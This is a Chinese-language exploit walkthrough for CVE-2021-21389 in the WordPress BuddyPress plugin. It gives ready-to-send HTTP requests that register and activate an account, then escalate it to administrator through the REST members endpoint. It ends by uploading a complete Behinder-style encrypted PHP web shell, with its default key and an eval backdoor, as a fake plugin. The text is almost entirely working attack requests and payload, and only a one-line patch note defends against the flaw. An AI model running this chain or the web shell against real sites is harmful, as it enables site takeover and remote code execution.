WordPress BuddyPress 越权漏洞RCE (CVE-2021-21389)漏洞原理
1、BuddyPress介绍
BuddyPress 是一个用于构建社区站点的开源 WordPress 插件。
2、漏洞概述
在 7.2.1 之前的 5.0.0 版本的 BuddyPress 中,非特权普通用户可以通过利用 REST API 成员端点中的问题来获得管理员权限。该漏洞已在 BuddyPress 7.2.1 中修复。插件的现有安装应更新到此版本以缓解问题
影响版本:5.0.0 <BuddyPress< 7.2.1
3、利用流程
访问首页
构造数据包:
1
2
3
4
5
6
7
8
9
10
| POST /wp-json/buddypress/v1/signup HTTP/1.1
Host: 123.58.236.76:61756
User-Agent: python-requests/2.21.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/json; charset=UTF-8
Content-Length: 92
{"user_login": "test", "user_email": "11@qq.com", "user_name": "test", "password": "123456"}
|
获取activation_key,构造发包饶过邮箱验证
1
2
3
4
5
6
7
| PUT /wp-json/buddypress/v1/signup/activate/ffX3IgFI12MUPXqIGnjyhr6RF4FEbfIB HTTP/1.1
Host: 123.58.236.76:61756
User-Agent: python-requests/2.21.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Length: 0
|
登录,新建分组,填写Details后,一直默认点击下一步。
任意登录后的数据包中提取出cookie和X-WP-Nonce 进行构造数据包提升权限:
1
2
3
4
5
6
7
8
9
10
11
12
| POST /wp-json/buddypress/v1/members/me HTTP/1.1
Host: 123.58.236.76:61756
User-Agent: python-requests/2.21.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
X-WP-Nonce: cac9969872
Content-Type: application/json; charset=UTF-8
Cookie: cookie_token=6accb2d46ae3de4d7641c3b1d00a4ee28c3b73fa6abae106ed042f50c05b3334; _ga=GA1.1.1558654561.1649746835; wp-settings-time-1=1653380957; wp-settings-2=mfold%3Do; wp-settings-time-2=1654766164; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_046315ac7dac40047fae695770685470=test%7C1655001699%7Cg9Lk7ciLq6XlcC8bIvt76ANy7PkiOS9mzJJmE4xNpmy%7Ce8fe870813ecbde11f0c597a2302bd53b5734bd4ad148bba4fc587fb329207d5; wordpress_logged_in_a31bcdfdcc76ffd77224a3a00a13790b=test%7C1656040800%7C0MdnODFES0bwxkaHmqCj8M5Y99D1cXJbdhRPDrV5tq1%7Ce2c6b5b04fa53e83786afbcdbff33b416eac2d76c5c1fb20af0f692721622d0b; bp_new_group_id=2; bp_completed_create_steps=WyJncm91cC1kZXRhaWxzIiwiZ3JvdXAtc2V0dGluZ3MiXQ%3D%3D
Content-Length: 26
{"roles": "administrator"}
|
这时我们就是管理员权限,进行插件上传shell:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
| POST /wp-admin/update.php?action=upload-plugin HTTP/1.1
Host: 123.58.236.76:61756
User-Agent: python-requests/2.21.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: wordpress_a31bcdfdcc76ffd77224a3a00a13790b=test11%7C1655003822%7CWywKqvlC1oZqbaxixPtj4ktkuQIZl28t1aSIzZWBRrz%7C59305b46ff0134f0dd8156dcf7759c8456e699e793df9b793461ea898ad26657; bp_completed_create_steps=WyJncm91cC1kZXRhaWxzIl0%3D; bp_new_group_id=1; wordpress_logged_in_a31bcdfdcc76ffd77224a3a00a13790b=test11%7C1655003822%7CWywKqvlC1oZqbaxixPtj4ktkuQIZl28t1aSIzZWBRrz%7C5bf446e62e7180b22e8c54d9f0585e54f85990591eed69df8c1a27ae68620e59; wordpress_test_cookie=WP%20Cookie%20check; wp-settings-time-2=1654831030
Content-Length: 1068
Content-Type: multipart/form-data; boundary=96862129455fbf8aa742653c38c7d828
--96862129455fbf8aa742653c38c7d828
Content-Disposition: form-data; name="_wpnonce"
9274320095
--96862129455fbf8aa742653c38c7d828
Content-Disposition: form-data; name="pluginzip"; filename="test.php"
Content-Type: application/octet-stream
<?php
@error_reporting(0);
session_start();
$key="e45e329feb5d925b"; //该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond
$_SESSION['k']=$key;
session_write_close();
$post=file_get_contents("php://input");
if(!extension_loaded('openssl'))
{
$t="base64_"."decode";
$post=$t($post."");
for($i=0;$i<strlen($post);$i++) {
$post[$i] = $post[$i]^$key[$i+1&15];
}
}
else
{
$post=openssl_decrypt($post, "AES128", $key);
}
$arr=explode('|',$post);
$func=$arr[0];
$params=$arr[1];
class C{public function __invoke($p) {eval($p."");}}
@call_user_func(new C(),$params);
?>
--96862129455fbf8aa742653c38c7d828
Content-Disposition: form-data; name="install-plugin-submit"
Install Now
--96862129455fbf8aa742653c38c7d828--
|
使用冰蝎链接:
4、修复方案
厂商已更新新版本,通过官网更新至最新版本。